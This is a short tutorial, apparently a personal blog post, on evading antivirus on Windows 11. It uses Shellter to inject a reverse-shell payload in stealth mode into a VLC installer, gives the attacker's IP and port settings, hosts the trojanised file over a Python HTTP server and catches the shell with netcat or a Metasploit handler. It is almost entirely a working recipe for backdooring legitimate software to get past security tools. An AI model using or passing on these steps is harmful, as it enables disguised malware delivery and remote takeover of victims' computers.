Anti-Virus Evasion

Antivirus Evasion on Windows 11

Using Shellter, I got a reverse shell on Windows 11. Below are the steps I followed:

Steps:

1. Run Shellter using Wine:

   wine shellter.exe
   

2. After Shellter opens, choose:
   

   Write the path of the target executable program:
   

   /home/kali/Downloads/vlc32.exe
   

3. Choose (Y) for stealth mode:
   

4. Choose (L) for local injection:
   

5. Select (5) for shell_reverse_tcp payload:
   

6. Set LHOST to your attacker machine’s IP address:

   LHOST 192.168.1.17
   

   

7. Set LPORT to the port you will be listening on (e.g., 4444):

   LPORT 4444
   

   

8. Press Enter and wait … for the process to finish

Sending the File to the Target

To send the generated .exe file to the target, you can use a simple HTTP server on Kali Linux:

1. In the path of the generated executable file, open a terminal and start an HTTP server:

   python -m http.server 8888
   

Opening a Listener on the Attacker Machine

You can open a listener in one of the following two ways:

1. Using Netcat:

nc -nlvp 4444

2. Using Metasploit:

msfconsole -x "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set LPORT 4444; set LHOST 192.168.1.17"

When the Metasploit console opens, type exploit or run to start the handler:

msf6 exploit(multi/handler)> exploit

Video Tutorial

Check out the following video for more details: